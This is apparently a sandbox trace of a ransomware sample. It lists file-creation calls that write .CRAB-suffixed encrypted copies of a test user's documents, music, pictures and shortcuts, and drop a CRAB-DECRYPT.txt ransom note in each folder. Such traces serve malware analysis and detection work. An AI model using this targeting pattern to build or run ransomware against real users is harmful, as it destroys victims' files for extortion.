Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\RpT-bEGffs.ods.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\d9hxfrAR\wQR1QuU.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\igDES1iqMNIbmY DRa.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\sgUrWmVa- RLPRKV9\qehE.doc.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\ssMNYPkw7qL8DJzpIX\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\ssMNYPkw7qL8DJzpIX\16UMlRP9A02gWyUy.ots.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\ssMNYPkw7qL8DJzpIX\6uw alCfFW.pps.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\ssMNYPkw7qL8DJzpIX\8N-mgdlW.pps.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\ssMNYPkw7qL8DJzpIX\gsju.pdf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\ssMNYPkw7qL8DJzpIX\iup1LNg7HVAePsTUSEkC.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\U2gzeIktu-byjwa.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\uq1Nb2XmH5I6GrWxAuJe\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Documents\uq1Nb2XmH5I6GrWxAuJe\1cPmkm-ywPOX4.rtf.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\uq1Nb2XmH5I6GrWxAuJe\cgeKKwxV.xlsx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\uq1Nb2XmH5I6GrWxAuJe\PwfZMG3ksx39-RDN.ppt.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\uq1Nb2XmH5I6GrWxAuJe\RNG65r7c8LO-Il.odp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\vPKDNEFrljOU.docx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\y2rs _ZZMZlJgrhd8J.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\ygYl94cpYLGRl9_3_-zh.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\zS6EYMN78ly.pptx.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Documents\ZxARlGu8PviwwCt.xls.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Downloads\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Favorites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Links\Suggested Sites.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Links\Web Slice Gallery.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Microsoft Websites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Microsoft Websites\IE Add-on site.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Microsoft Websites\IE site on Microsoft.com.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Microsoft Websites\Microsoft At Home.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Microsoft Websites\Microsoft At Work.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Microsoft Websites\Microsoft Store.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\MSN Websites\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Favorites\MSN Websites\MSN Autos.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\MSN Websites\MSN Entertainment.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\MSN Websites\MSN Money.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\MSN Websites\MSN Sports.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\MSN Websites\MSN.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\MSN Websites\MSNBC News.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Windows Live\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Windows Live\Get Windows Live.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Windows Live\Windows Live Gallery.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Windows Live\Windows Live Mail.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Favorites\Windows Live\Windows Live Spaces.url.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Links\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\aETAdzjz\Music\61fxIv eer8S1Mqo.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\iIrv\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\iIrv\JjLKVZdT.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\iIrv\KuS60JtvZw.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\iIrv\l QKf 0.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\iIrv\pA8KwOnLJtUQ4hBXlHZP.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\iIrv\prhXMR7T8g.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\JeJX_aMs\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\JeJX_aMs\CU5PfXU.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\JeJX_aMs\duWxKD0ZXjzDRQ.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\JeJX_aMs\wh9q_OvkS_aEL1Rc.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\4bHA3Lvj8szny.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\6ecWlr2quMnopM0OscvW.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\70F8.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\DSFP3I- wg7A4F.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\jWOHGhXVkVWLraCO_Fr.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\SAa nmVH550yRTPDB.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\TWNJkld 6F.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\w0UBph-g4RNNwhfBDk.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\6NdqEO2wTIYr9ArwUHlY\MOyq6qDeef\wAxQZ.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\A8bU5\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\A8bU5\7G7cxr6JYfn.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\A8bU5\I3QXwTjYd4gQwsUpi-\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\A8bU5\I3QXwTjYd4gQwsUpi-\m4jbfu4K7KtfYC-.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\A8bU5\I3QXwTjYd4gQwsUpi-\WOm1yknmyl.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\A8bU5\I3QXwTjYd4gQwsUpi-\_7lRrh06nq 6qunhCEpR.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\A8bU5\OIMoKxTExS56KxK.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\AMGStB1Ioxb\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\AMGStB1Ioxb\gcNaUkJ.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\AMGStB1Ioxb\H4l Lg6tH7YU1qi.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\AMGStB1Ioxb\IfzNNa.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\AMGStB1Ioxb\RoMyjmIGtVmY-XdboMAP.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\i9E.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\Jp7u4FxS0pSx3it\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\Jp7u4FxS0pSx3it\H0Jc3G9Ae.m4a.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\Jp7u4FxS0pSx3it\iL34.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\Jp7u4FxS0pSx3it\JJXptkSm.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\nFWW2P9-9xi6.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\QHyBu-QZ9T\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\QHyBu-QZ9T\jLiKTORizLt1LAKb7E.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\QHyBu-QZ9T\P1JCwRApcpS7IdT4.wav.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\QHyBu-QZ9T\yYzCUp8\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Music\QHyBu-QZ9T\yYzCUp8\6BI3OjK8afD.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Music\QHyBu-QZ9T\yYzCUp8\cjcFyakoZXy2Hxr-.mp3.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\My Documents\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\aETAdzjz\NetHood\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\ntuser.ini.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\OneDrive\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Pictures\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL False 1
Fn
Create C:\Users\aETAdzjz\Pictures\00rVQt_1w.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\2_BF.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\aMH05IlsQ.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\csQB71bMhGC7MLfidI r.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\f_vA14XSucTx.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\gm8PTA-.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\KDOaFsf8r9eznN-0.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\Ny p Q6.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\PcgC9P-R.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\PeMLxeLztlk8r2L.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\PYWmN2 VY.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\4lK2w9HJo1OfLb-8P.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\ClKZnjaOupgEd.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\eR_TMeZLUhW0j.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\fC_Q2g_1TjiW\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\fC_Q2g_1TjiW\3RHoYKV.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\fC_Q2g_1TjiW\AWOwS.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\fC_Q2g_1TjiW\mSf-S2wblA.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\fC_Q2g_1TjiW\NIWg.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\fC_Q2g_1TjiW\rnwJ_94EN.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\fC_Q2g_1TjiW\XFXMaxC_9.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\gqqGDoh9.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\N95gQo.png.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\POQwwpmEjmF7iFxW3.gif.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\rSjRM6n4eNw.jpg.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Users\aETAdzjz\Pictures\SL4hXH\yD2cam0sO5XnevVOPED.bmp.CRAB desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
